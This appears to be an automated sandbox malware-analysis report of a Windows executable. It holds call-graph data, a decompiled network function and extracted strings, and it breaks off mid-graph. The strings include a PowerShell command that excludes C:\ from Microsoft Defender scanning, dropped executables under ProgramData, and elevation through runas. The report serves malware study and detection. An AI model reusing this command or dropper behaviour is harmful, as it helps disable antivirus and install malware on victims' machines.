26721->26724 26731 7ff7191c5500 26723->26731 26724->26723 26726 7ff7191d23b0 _handle_error 8 API calls 26727 7ff7191c4824 26726->26727 26727->26382 26727->26687 26728 7ff7191c6b9d 26729 7ff7191c6ba1 __std_exception_copy 26728->26729 26743 7ff7191c9be0 8 API calls _handle_error 26728->26743 26729->26726 26732 7ff7191c5528 26731->26732 26733 7ff7191c5558 26732->26733 26734 7ff7191c5ef0 2 API calls 26732->26734 26733->26728 26735 7ff7191c5588 26734->26735 26736 7ff7191c5ef0 2 API calls 26735->26736 26737 7ff7191c562b 26736->26737 26738 7ff7191c5ef0 2 API calls 26737->26738 26739 7ff7191c5641 26738->26739 26740 7ff7191c5ef0 2 API calls 26739->26740 26741 7ff7191c5676 26740->26741 26742 7ff7191c5ef0 2 API calls 26741->26742 26742->26733 26743->26729 26745->26696 26747 7ff7191b8c8a ctype 26746->26747 26748 7ff7191b8c1d ctype 26746->26748 26747->26748 26751 7ff7191d99cc 26747->26751 26748->26707 26750->26710 26752 7ff7191d99ec 26751->26752 26753 7ff7191d9a06 26751->26753 26752->26753 26754 7ff7191d99f6 26752->26754 26755 7ff7191d9a0e 26752->26755 26753->26748 26767 7ff7191dc854 13 API calls _set_errno_from_matherr 26754->26767 26760 7ff7191d977c 26755->26760 26758 7ff7191d99fb 26768 7ff7191da5d8 30 API calls _invalid_parameter_noinfo_noreturn 26758->26768 26769 7ff7191d9764 EnterCriticalSection 26760->26769 26762 7ff7191d9799 26763 7ff7191d97bc 62 API calls 26762->26763 26764 7ff7191d97a2 26763->26764 26765 7ff7191d9770 _fread_nolock LeaveCriticalSection 26764->26765 26766 7ff7191d97ad 26765->26766 26766->26753 26767->26758 26768->26753 26771 7ff7191ba79a 26770->26771 26772 7ff7191ba74c 26770->26772 26771->26416 26776 7ff7191ba540 64 API calls _handle_error 26772->26776 26774 7ff7191ba783 26777 7ff7191d8d14 64 API calls 3 library calls 26774->26777 26776->26774 26777->26771 26779 7ff7191cf10b 26778->26779 26780 7ff7191cf0ae 26778->26780 26779->26182 26780->26779 26781 7ff7191cf0ec 26780->26781 26783 7ff7191e6b28 13 API calls 26780->26783 26784 7ff7191e6b28 13 API calls 26781->26784 26782 7ff7191cf0fb 26782->26182 26783->26781 26784->26782 26785->26183 26786->26200 26787 7ff7191b5270 CreateProcessA CloseHandle CloseHandle 26788 7ff7191d23b0 _handle_error 8 API calls 26787->26788 26789 7ff7191b5325 26788->26789 26790 7ff7191b6eb0 SHGetSpecialFolderPathW GetModuleHandleW FindResourceW 26791 7ff7191b6ff2 CoInitializeEx CoCreateInstance 26790->26791 26792 7ff7191b6f10 GetModuleHandleW LoadResource 26790->26792 26793 7ff7191b702a 26791->26793 26794 7ff7191b70c8 DeleteFileW 26791->26794 26792->26791 26795 7ff7191b6f2d LockResource 26792->26795 26796 7ff7191b702f lstrlenW 26793->26796 26797 7ff7191b704d lstrlenW 26793->26797 26798 7ff7191d23b0 _handle_error 8 API calls 26794->26798 26799 7ff7191b6fe2 26795->26799 26800 7ff7191b6f4a GetModuleHandleW SizeofResource lstrcatW 26795->26800 26796->26797 26801 7ff7191b703c 26796->26801 26806 7ff7191b705e 26797->26806 26802 7ff7191b70e5 26798->26802 26799->26791 26800->26799 26803 7ff7191b6f7f CreateFileW 26800->26803 26801->26797 26803->26799 26804 7ff7191b6fb8 WriteFile 26803->26804 26804->26799 26805 7ff7191b6fd9 CloseHandle 26804->26805 26805->26799 26806->26794 26807 7ff7191b4750 26808 7ff7191b4776 _Tolower memcpy_s 26807->26808 26877 7ff7191bb740 26808->26877 26810 7ff7191b47b0 26811 7ff7191bab00 32 API calls 26810->26811 26812 7ff7191b47c6 26811->26812 26891 7ff7191b9520 26812->26891 26814 7ff7191b4812 26815 7ff7191ba9a0 32 API calls 26814->26815 26816 7ff7191b4f20 26814->26816 26874 7ff7191b4f1a 26814->26874 26818 7ff7191b4905 26815->26818 26819 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26816->26819 26817 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26817->26816 26821 7ff7191bb100 72 API calls 26818->26821 26820 7ff7191b4f26 26819->26820 26822 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26820->26822 26823 7ff7191b492d 26821->26823 26824 7ff7191b4f2c 26822->26824 26911 7ff7191bd2d0 26823->26911 26825 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26824->26825 26827 7ff7191b4f32 26825->26827 26830 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26827->26830 26829 7ff7191ba730 67 API calls 26831 7ff7191b497f 26829->26831 26832 7ff7191b4f38 26830->26832 26833 7ff7191b49b0 26831->26833 26835 7ff7191b2b00 32 API calls 26831->26835 26834 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26832->26834 26836 7ff7191ba9a0 32 API calls 26833->26836 26837 7ff7191b4f3e 26834->26837 26835->26833 26838 7ff7191b49da 26836->26838 26840 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26837->26840 26839 7ff7191bab00 32 API calls 26838->26839 26841 7ff7191b49f6 26839->26841 26842 7ff7191b4f44 26840->26842 26843 7ff7191bab00 32 API calls 26841->26843 26846 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26842->26846 26844 7ff7191b4a0c 26843->26844 26845 7ff7191b4a5b 26844->26845 26926 7ff7191bc130 32 API calls 4 library calls 26844->26926 26848 7ff7191b4aba 26845->26848 26927 7ff7191bc2a0 32 API calls 4 library calls 26845->26927 26849 7ff7191b4f4a 26846->26849 26850 7ff7191bb740 32 API calls 26848->26850 26852 7ff7191b4ac7 26850->26852 26853 7ff7191bab00 32 API calls 26852->26853 26854 7ff7191b4add 26853->26854 26854->26820 26855 7ff7191bab00 32 API calls 26854->26855 26856 7ff7191b4b72 memcpy_s 26855->26856 26857 7ff7191b4b86 MultiByteToWideChar 26856->26857 26858 7ff7191bb740 32 API calls 26857->26858 26859 7ff7191b4bc6 26858->26859 26860 7ff7191bab00 32 API calls 26859->26860 26861 7ff7191b4bdc memcpy_s 26860->26861 26861->26824 26862 7ff7191b4c4b MultiByteToWideChar 26861->26862 26922 7ff7191d9a50 MoveFileExW 26862->26922 26865 7ff7191b4e32 26867 7ff7191b9470 67 API calls 26865->26867 26866 7ff7191b4cd4 26866->26827 26866->26832 26866->26837 26866->26842 26866->26865 26868 7ff7191b4f0f 26866->26868 26871 7ff7191b4e60 26867->26871 26869 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26868->26869 26870 7ff7191b4f14 26869->26870 26873 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26870->26873 26871->26870 26875 7ff7191b4ecc 26871->26875 26872 7ff7191d23b0 _handle_error 8 API calls 26876 7ff7191b4ef2 26872->26876 26873->26874 26874->26817 26875->26872 26878 7ff7191bb889 26877->26878 26882 7ff7191bb773 26877->26882 26928 7ff7191b1300 32 API calls __std_exception_copy 26878->26928 26880 7ff7191bb88f 26929 7ff7191b1260 32 API calls 3 library calls 26880->26929 26881 7ff7191bb800 ctype 26881->26810 26882->26881 26885 7ff7191bb7e2 26882->26885 26886 7ff7191bb80e 26882->26886 26884 7ff7191bb895 26885->26880 26888 7ff7191d23d8 std::_Facet_Register 32 API calls 26885->26888 26886->26881 26887 7ff7191d23d8 std::_Facet_Register 32 API calls 26886->26887 26887->26881 26889 7ff7191bb7f7 26888->26889 26889->26881 26890 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26889->26890 26890->26878 26892 7ff7191d23d8 std::_Facet_Register 32 API calls 26891->26892 26893 7ff7191b95ea 26892->26893 26894 7ff7191d1144 38 API calls 26893->26894 26895 7ff7191b95fa 26894->26895 26896 7ff7191bb100 72 API calls 26895->26896 26897 7ff7191b9628 26896->26897 26898 7ff7191b9673 26897->26898 26899 7ff7191b2b00 32 API calls 26897->26899 26900 7ff7191d23d8 std::_Facet_Register 32 API calls 26898->26900 26899->26898 26901 7ff7191b96b0 26900->26901 26902 7ff7191d1144 38 API calls 26901->26902 26903 7ff7191b96c0 26902->26903 26904 7ff7191b9800 26903->26904 26905 7ff7191b974c 26903->26905 26907 7ff7191b2b00 32 API calls 26904->26907 26930 7ff7191ba630 30 API calls _handle_error 26905->26930 26910 7ff7191b977b 26907->26910 26908 7ff7191b975d 26931 7ff7191bbde0 66 API calls 5 library calls 26908->26931 26910->26814 26912 7ff7191bd31f 26911->26912 26932 7ff7191bd990 26912->26932 26914 7ff7191bd390 26916 7ff7191b2b00 32 API calls 26914->26916 26915 7ff7191bd330 26915->26914 26918 7ff7191bd374 26915->26918 26943 7ff7191b8ed0 26915->26943 26917 7ff7191b4976 26916->26917 26917->26829 26918->26914 26921 7ff7191b8ed0 49 API calls 26918->26921 26962 7ff7191bc910 32 API calls 4 library calls 26918->26962 26921->26918 26923 7ff7191d9a64 GetLastError 26922->26923 26924 7ff7191b4c91 SleepEx ShellExecuteW 26922->26924 26989 7ff7191dc7e4 13 API calls 2 library calls 26923->26989 26924->26866 26926->26845 26927->26845 26928->26880 26929->26884 26930->26908 26931->26910 26933 7ff7191bd9b9 26932->26933 26934 7ff7191bd9e7 26932->26934 26935 7ff7191b2b00 32 API calls 26933->26935 26937 7ff7191baea0 65 API calls 26934->26937 26939 7ff7191bd9f5 26934->26939 26936 7ff7191bd9d7 26935->26936 26936->26915 26937->26939 26938 7ff7191bdb77 26938->26915 26939->26938 26940 7ff7191bb100 72 API calls 26939->26940 26941 7ff7191bda36 26940->26941 26941->26938 26942 7ff7191b2b00 32 API calls 26941->26942 26942->26938 26944 7ff7191b8f02 26943->26944 26945 7ff7191b8f7d 26944->26945 26950 7ff7191b8f98 ctype 26944->26950 26953 7ff7191b8f12 26944->26953 26963 7ff7191d9288 26945->26963 26946 7ff7191d23b0 _handle_error 8 API calls 26948 7ff7191b915e 26946->26948 26948->26918 26949 7ff7191d9288 47 API calls 26949->26950 26950->26949 26952 7ff7191b90b7 26950->26952 26960 7ff7191b90cf 26950->26960 26984 7ff7191bc910 32 API calls 4 library calls 26950->26984 26952->26953 26954 7ff7191b9173 26952->26954 26953->26946 26955 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26954->26955 26956 7ff7191b9178 26955->26956 26957 7ff7191b91a4 26956->26957 26961 7ff7191b8ed0 49 API calls 26956->26961 26957->26918 26958 7ff7191b91bb 26958->26918 26960->26952 26985 7ff7191d9dc4 33 API calls 3 library calls 26960->26985 26961->26958 26962->26918 26964 7ff7191d92a4 26963->26964 26965 7ff7191d92c2 26963->26965 26987 7ff7191dc854 13 API calls _set_errno_from_matherr 26964->26987 26986 7ff7191d9764 EnterCriticalSection 26965->26986 26968 7ff7191d92a9 26988 7ff7191da5d8 30 API calls _invalid_parameter_noinfo_noreturn 26968->26988 26969 7ff7191d92c7 26971 7ff7191d9377 26969->26971 26972 7ff7191e4fcc _fread_nolock 30 API calls 26969->26972 26973 7ff7191d923c 44 API calls 26971->26973 26976 7ff7191d92de 26972->26976 26974 7ff7191d937f 26973->26974 26975 7ff7191d9770 _fread_nolock LeaveCriticalSection 26974->26975 26977 7ff7191d92b4 26975->26977 26976->26971 26978 7ff7191d934c 26976->26978 26977->26953 26979 7ff7191dc854 _set_errno_from_matherr 13 API calls 26978->26979 26980 7ff7191d9351 26979->26980 26981 7ff7191da5d8 _invalid_parameter_noinfo 30 API calls 26980->26981 26982 7ff7191d935c 26981->26982 26983 7ff7191f6ea0 _local_unwind RtlUnwind 26982->26983 26983->26977 26984->26950 26985->26960 26987->26968 26988->26977 26989->26924 26990 7ff7191b43f0 26991 7ff7191b4460 26990->26991 26991->26991 26992 7ff7191ba9a0 32 API calls 26991->26992 26993 7ff7191b4475 26992->26993 27017 7ff7191c0f20 26993->27017 26995 7ff7191b4486 27016 7ff7191b473a 26995->27016 27039 7ff7191c4230 26995->27039 26997 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26999 7ff7191b4740 26997->26999 26998 7ff7191b458c 27042 7ff7191c31d0 21 API calls __std_exception_copy 26998->27042 27001 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26999->27001 27002 7ff7191b4746 27001->27002 27003 7ff7191b46a8 27043 7ff7191c15d0 30 API calls 2 library calls 27003->27043 27004 7ff7191ba9a0 32 API calls 27009 7ff7191b44ec 27004->27009 27006 7ff7191b46c5 27007 7ff7191b46f4 27006->27007 27012 7ff7191b4734 27006->27012 27010 7ff7191d23b0 _handle_error 8 API calls 27007->27010 27008 7ff7191b472f 27011 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 27008->27011 27009->26998 27009->26999 27009->27004 27014 7ff7191b4718 27010->27014 27011->27012 27015 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 27012->27015 27013 7ff7191b4595 27013->27003 27013->27008 27015->27016 27016->26997 27018 7ff7191d23d8 std::_Facet_Register 32 API calls 27017->27018 27019 7ff7191c0f47 27018->27019 27020 7ff7191c0f61 27019->27020 27021 7ff7191c0de0 73 API calls 27019->27021 27022 7ff7191d23d8 std::_Facet_Register 32 API calls 27020->27022 27021->27020 27023 7ff7191c0f73 27022->27023 27024 7ff7191b9e00 69 API calls 27023->27024 27025 7ff7191c0f98 27024->27025 27026 7ff7191b9e00 69 API calls 27025->27026 27027 7ff7191c0fa5 27026->27027 27028 7ff7191d23d8 std::_Facet_Register 32 API calls 27027->27028 27029 7ff7191c0fb6 27028->27029 27044 7ff7191c6ac0 27029->27044 27031 7ff7191c101c 27032 7ff7191c1025 27031->27032 27051 7ff7191c4e90 27031->27051 27032->26995 27034 7ff7191c1047 27035 7ff7191c1330 30 API calls 27034->27035 27036 7ff7191c1058 27035->27036 27037 7ff7191d41cc _com_raise_error 2 API calls 27036->27037 27038 7ff7191c1069 27037->27038 27088 7ff7191c49a0 27039->27088 27041 7ff7191c425f 27041->27009 27042->27013 27043->27006 27045 7ff7191c6acc 27044->27045 27046 7ff7191c6b1b 27044->27046 27059 7ff7191c7290 27045->27059 27048 7ff7191c7290 10 API calls 27046->27048 27050 7ff7191c6b20 27048->27050 27050->27031 27052 7ff7191c4ee4 27051->27052 27053 7ff7191c4eaa 27051->27053 27055 7ff7191c4f3d __std_exception_copy 27052->27055 27087 7ff7191c62e0 21 API calls __std_exception_copy 27052->27087 27053->27052 27056 7ff7191c4f70 27053->27056 27055->27034 27057 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 27056->27057 27058 7ff7191c4f75 27057->27058 27058->27034 27064 7ff7191c72d5 27059->27064 27060 7ff7191d23b0 _handle_error 8 API calls 27061 7ff7191c6b13 27060->27061 27061->27031 27062 7ff7191c73a4 __std_exception_copy 27062->27060 27063 7ff7191c7490 __std_exception_copy 27063->27062 27065 7ff7191c5ef0 2 API calls 27063->27065 27064->27062 27064->27063 27086 7ff7191c84d0 2 API calls 27064->27086 27068 7ff7191c74d6 27065->27068 27066 7ff7191c5ef0 2 API calls 27067 7ff7191c76fc 27066->27067 27069 7ff7191c5ef0 2 API calls 27067->27069 27068->27066 27070 7ff7191c771c 27069->27070 27070->27062 27071 7ff7191c5ef0 2 API calls 27070->27071 27085 7ff7191c79b7 27070->27085 27072 7ff7191c77db 27071->27072 27073 7ff7191c5ef0 2 API calls 27072->27073 27072->27085 27074 7ff7191c7802 27073->27074 27076 7ff7191c5ef0 2 API calls 27074->27076 27074->27085 27075 7ff7191c5750 2 API calls 27075->27062 27077 7ff7191c7834 27076->27077 27078 7ff7191c5ef0 2 API calls 27077->27078 27077->27085 27079 7ff7191c786c 27078->27079 27080 7ff7191c5ef0 2 API calls 27079->27080 27079->27085 27081 7ff7191c78c3 27080->27081 27082 7ff7191c5ef0 2 API calls 27081->27082 27083 7ff7191c79a0 27082->27083 27084 7ff7191c5ef0 2 API calls 27083->27084 27084->27085 27085->27062 27085->27075 27086->27064 27087->27055 27114 7ff7191c6500 27088->27114 27090 7ff7191c4c0f 27091 7ff7191d23b0 _handle_error 8 API calls 27090->27091 27092 7ff7191c4c1e 27091->27092 27092->27041 27093 7ff7191c64b0 2 API calls 27104 7ff7191c49dd memcpy_s 27093->27104 27094 7ff7191c1330 30 API calls 27095 7ff7191c4c4d 27094->27095 27096 7ff7191d41cc _com_raise_error 2 API calls 27095->27096 27098 7ff7191c4c5e 27096->27098 27097 7ff7191ba9a0 32 API calls 27097->27104 27100 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 27098->27100 27099 7ff7191c1070 107 API calls 27099->27104 27103 7ff7191c4c64 27100->27103 27101 7ff7191b9e00 69 API calls 27101->27104 27105 7ff7191c4c94 27103->27105 27140 7ff7191bab90 32 API calls 3 library calls 27103->27140 27104->27090 27104->27093 27104->27097 27104->27098 27104->27099 27104->27101 27106 7ff7191c4c36 27104->27106 27109 7ff7191c4c3b 27104->27109 27110 7ff7191c6630 ReadFile GetLastError 27104->27110 27119 7ff7191c0010 27104->27119 27105->27041 27107 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 27106->27107 27107->27109 27109->27094 27110->27104 27111 7ff7191c4d46 ctype 27112 7ff7191c4ddf 27111->27112 27141 7ff7191babf0 30 API calls _invalid_parameter_noinfo_noreturn 27111->27141 27112->27041 27115 7ff7191c6517 27114->27115 27116 7ff7191c650e 27114->27116 27117 7ff7191c5750 2 API calls 27115->27117 27116->27104 27118 7ff7191c655f 27117->27118 27118->27104 27120 7ff7191c0085 27119->27120 27121 7ff7191c0293 27119->27121 27123 7ff7191c028e 27120->27123 27126 7ff7191c0114 27120->27126 27127 7ff7191c00ea 27120->27127 27144 7ff7191bd190 32 API calls 27121->27144 27143 7ff7191b1260 32 API calls 3 library calls 27123->27143 27124 7ff7191c0211 27128 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 27124->27128 27139 7ff7191c0258 27124->27139 27130 7ff7191d23d8 std::_Facet_Register 32 API calls 27126->27130 27133 7ff7191c00fd 27126->27133 27127->27123 27129 7ff7191c00f8 27127->27129 27131 7ff7191c029f 27128->27131 27132 7ff7191d23d8 std::_Facet_Register 32 API calls 27129->27132 27130->27133 27132->27133 27133->27124 27134 7ff7191b9e00 69 API calls 27133->27134 27135 7ff7191c016a 27134->27135 27136 7ff7191b9e00 69 API calls 27135->27136 27137 7ff7191c0178 27136->27137 27137->27124 27137->27139 27142 7ff7191bd800 30 API calls _invalid_parameter_noinfo_noreturn 27137->27142 27139->27104 27140->27111 27141->27112 27142->27137 27143->27121 27145 7ff7191b4ff0 27146 7ff7191ba9a0 32 API calls 27145->27146 27147 7ff7191b504a 27146->27147 27148 7ff7191bab00 32 API calls 27147->27148 27149 7ff7191b5065 27148->27149 27150 7ff7191bab00 32 API calls 27149->27150 27151 7ff7191b507b 27150->27151 27154 7ff7191b50c8 27151->27154 27168 7ff7191bc130 32 API calls 4 library calls 27151->27168 27153 7ff7191b5126 ShellExecuteW 27155 7ff7191b515d 27153->27155 27154->27153 27169 7ff7191bc2a0 32 API calls 4 library calls 27154->27169 27156 7ff7191b51d6 27155->27156 27158 7ff7191b525f 27155->27158 27161 7ff7191b5254 27155->27161 27159 7ff7191b5219 27156->27159 27166 7ff7191b5259 27156->27166 27162 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 27158->27162 27160 7ff7191d23b0 _handle_error 8 API calls 27159->27160 27163 7ff7191b523c 27160->27163 27164 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 27161->27164 27165 7ff7191b5265 27162->27165 27164->27166 27167 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 27166->27167 27167->27158 27168->27154 27169->27154 27170 7ff7191c8230 27171 7ff7191c824f 27170->27171 27172 7ff7191c828d CreateFileA 27171->27172 27175 7ff7191c82d1 27171->27175 27173 7ff7191c82b6 27172->27173 27172->27175 27174 7ff7191c82c8 CloseHandle 27173->27174 27173->27175 27174->27175 27176 7ff7191cee68 27177 7ff7191ce1a7 27176->27177 27179 7ff7191ce223 27177->27179 27180 7ff7191cf3b0 27177->27180 27181 7ff7191cf3d5 27180->27181 27182 7ff7191cf3eb ctype 27180->27182 27183 7ff7191e82bc 14 API calls 27181->27183 27182->27179 27183->27182

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 00007FF7191BDD20 Relevance: 71.9, APIs: 8, Strings: 33, Instructions: 174networkfileCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 16%
                                                                                                                                                              			E00007FF77FF7191BDD20(void* __edx, long long __rbx, long long __rcx, intOrPtr* __r8, long long _a16) {
				signed int _v72;
				long long _v1136;
				long long _v1144;
				intOrPtr _v1160;
				void* _t15;
				void* _t18;
				signed long long _t26;
				signed long long _t27;
				intOrPtr _t39;
				void* _t44;
				long long _t50;

				_a16 = __rbx;
				_t45 = _t44 - 0x470;
				_t26 =  *0x192190a0; // 0x590452ce5669
				_t27 = _t26 ^ _t44 - 0x00000470;
				_v72 = _t27;
				_v1136 = __rcx;
				_v1144 = __r8;
				r13d = 0;
				_v1160 = r13d;
				r9d = 0;
				r8d = 0;
				__imp__InternetOpenA(); // executed
				if (_t27 != 0) goto 0x191bde0f;
				 *((long long*)(__rcx)) = _t50;
				 *((long long*)(__rcx + 0x10)) = _t50;
				 *((long long*)(__rcx + 0x18)) = 0xf;
				 *((intOrPtr*)(__rcx)) = r13b;
				_t39 =  *((intOrPtr*)(__r8 + 0x18));
				if (_t39 - 0x10 < 0) goto 0x191bddd2;
				_t33 =  *__r8;
				if (_t39 + 1 - 0x1000 < 0) goto 0x191bddcd;
				if ( *__r8 -  *((intOrPtr*)(_t33 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191bdfd2;
				0x191d23d0();
				 *((long long*)(__r8 + 0x10)) = _t50;
				 *((long long*)(__r8 + 0x18)) = 0xf;
				 *((char*)(__r8)) = 0;
				return E00007FF77FF7191D23B0(_t15, _t18, _v72 ^ _t45);
			}














                                                                                                                                                              0x7ff7191bdd20
                                                                                                                                                              0x7ff7191bdd30
                                                                                                                                                              0x7ff7191bdd37
                                                                                                                                                              0x7ff7191bdd3e
                                                                                                                                                              0x7ff7191bdd41
                                                                                                                                                              0x7ff7191bdd51
                                                                                                                                                              0x7ff7191bdd56
                                                                                                                                                              0x7ff7191bdd5b
                                                                                                                                                              0x7ff7191bdd5e
                                                                                                                                                              0x7ff7191bdd63
                                                                                                                                                              0x7ff7191bdd66
                                                                                                                                                              0x7ff7191bdd74
                                                                                                                                                              0x7ff7191bdd80
                                                                                                                                                              0x7ff7191bdd86
                                                                                                                                                              0x7ff7191bdd89
                                                                                                                                                              0x7ff7191bdd8d
                                                                                                                                                              0x7ff7191bdd95
                                                                                                                                                              0x7ff7191bdd98
                                                                                                                                                              0x7ff7191bdda0
                                                                                                                                                              0x7ff7191bdda5
                                                                                                                                                              0x7ff7191bddaf
                                                                                                                                                              0x7ff7191bddc4
                                                                                                                                                              0x7ff7191bddcd
                                                                                                                                                              0x7ff7191bddd2
                                                                                                                                                              0x7ff7191bddd6
                                                                                                                                                              0x7ff7191bdde1
                                                                                                                                                              0x7ff7191bde0e

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Internet$CloseHandle$Open_invalid_parameter_noinfo_noreturn$FileRead
                                                                                                                                                              • String ID: *$123$C:\ProgramData\Data$C:\ProgramData\Data\$C:\ProgramData\Data\*$C:\ProgramData\Data\GPU.zip$C:\ProgramData\MicrosoftNetwork$C:\ProgramData\MicrosoftNetwork\System.exe$C:\ProgramData\MicrosoftNetwork\System.exe$C:\ProgramData\Systemd$C:\ProgramData\Systemd\$C:\ProgramData\Systemd\*$C:\ProgramData\Systemd\CPU.zip$C:\ProgramData\Systemd\install.exe$C:\ProgramData\Systemd\install2.exe$C:\ProgramData\Systemd\install3.exe$C:\ProgramData\Systemd\install4.exe$C:\ProgramData\Systemd\install5.exe$C:\ProgramData\UpSys.exe$C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty $C:\ProgramData\check.txt$Caption$Data$Direct3DCreate9Ex$Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36$SELECT * FROM Win32_VideoController$Systemd$WQL$\exe.lnk$d3d9.dll$powershell.exe$root\CIMV2$runas
                                                                                                                                                              • API String ID: 390992788-888773548
                                                                                                                                                              • Opcode ID: 5adc7e11a66d304b610aa09a53afbdd13eb1c894cbdce03377970dc51fa490e5
                                                                                                                                                              • Instruction ID: 1cd41105142d72a4bdbd60c19fac96a546c5f70056cc6d887f0dd21094343445
                                                                                                                                                              • Opcode Fuzzy Hash: 5adc7e11a66d304b610aa09a53afbdd13eb1c894cbdce03377970dc51fa490e5
                                                                                                                                                              • Instruction Fuzzy Hash: AE71AC76618A8182FA14AF15F54436AA372FB45BA8F804031EF8E03A95DF7CE5DAD710
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B5930 Relevance: 37.5, APIs: 15, Strings: 6, Instructions: 763processCOMMONCrypto
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 218 7ff7191b5930-7ff7191b5a25 call 7ff7191d4a30 call 7ff7191b9520 call 7ff7191ba9a0 call 7ff7191bb100 229 7ff7191b5a43-7ff7191b5a60 call 7ff7191bd2d0 call 7ff7191ba730 218->229 230 7ff7191b5a27-7ff7191b5a31 218->230 237 7ff7191b5a62-7ff7191b5a89 call 7ff7191b2b00 229->237 238 7ff7191b5a8e-7ff7191b5ad0 229->238 230->229 234 7ff7191b5a33-7ff7191b5a3d 230->234 234->229 237->238 240 7ff7191b5ad2-7ff7191b5ae2 call 7ff7191bc130 238->240 241 7ff7191b5ae6-7ff7191b5af2 238->241 240->241 243 7ff7191b5af4-7ff7191b5afb 241->243 244 7ff7191b5b3a-7ff7191b5b5b call 7ff7191da670 241->244 246 7ff7191b5b1f-7ff7191b5b23 call 7ff7191bc2a0 243->246 247 7ff7191b5afd-7ff7191b5b1d 243->247 253 7ff7191b5b60-7ff7191b5b6f 244->253 249 7ff7191b5b28-7ff7191b5b2e 246->249 247->249 249->244 252 7ff7191b5b30-7ff7191b5b38 249->252 252->243 253->253 254 7ff7191b5b71-7ff7191b5bd9 CreateProcessW call 7ff7191d9c88 GetLastError CloseHandle * 2 253->254 257 7ff7191b5c11-7ff7191b5c2a 254->257 258 7ff7191b5bdb-7ff7191b5bf1 254->258 261 7ff7191b5c5d-7ff7191b5d00 call 7ff7191b9470 call 7ff7191d1494 call 7ff7191d23b0 257->261 262 7ff7191b5c2c-7ff7191b5c3d 257->262 259 7ff7191b5bf3-7ff7191b5c06 258->259 260 7ff7191b5c0c call 7ff7191d23d0 258->260 259->260 263 7ff7191b5d07-7ff7191b5e2d call 7ff7191da5f8 call 7ff7191d4a30 call 7ff7191b8490 call 7ff7191d4a30 call 7ff7191b9520 call 7ff7191ba9a0 call 7ff7191bb100 259->263 260->257 265 7ff7191b5c3f-7ff7191b5c52 262->265 266 7ff7191b5c58 call 7ff7191d23d0 262->266 294 7ff7191b5e2f-7ff7191b5e38 263->294 295 7ff7191b5e4a-7ff7191b5e76 call 7ff7191bd2d0 call 7ff7191ba730 263->295 265->266 269 7ff7191b5d01-7ff7191b5d06 call 7ff7191da5f8 265->269 266->261 269->263 294->295 299 7ff7191b5e3a-7ff7191b5e44 294->299 302 7ff7191b5ea3-7ff7191b5f31 call 7ff7191ba9a0 call 7ff7191bab00 295->302 303 7ff7191b5e78-7ff7191b5e9e call 7ff7191b2b00 295->303 299->295 309 7ff7191b5f33-7ff7191b5f45 call 7ff7191bc130 302->309 310 7ff7191b5f4a-7ff7191b5f57 302->310 303->302 309->310 312 7ff7191b5f59 310->312 313 7ff7191b5fac-7ff7191b5fbb 310->313 316 7ff7191b5f60-7ff7191b5f67 312->316 314 7ff7191b5fc0-7ff7191b6007 call 7ff7191bcca0 313->314 326 7ff7191b6025-7ff7191b6045 call 7ff7191bd550 314->326 327 7ff7191b6009-7ff7191b6012 314->327 317 7ff7191b5f69-7ff7191b5f8c 316->317 318 7ff7191b5f8e-7ff7191b5f93 call 7ff7191bc2a0 316->318 321 7ff7191b5f98-7ff7191b5fa3 317->321 318->321 321->313 322 7ff7191b5fa5-7ff7191b5faa 321->322 322->316 331 7ff7191b6080-7ff7191b608f call 7ff7191ba390 326->331 332 7ff7191b6047-7ff7191b6051 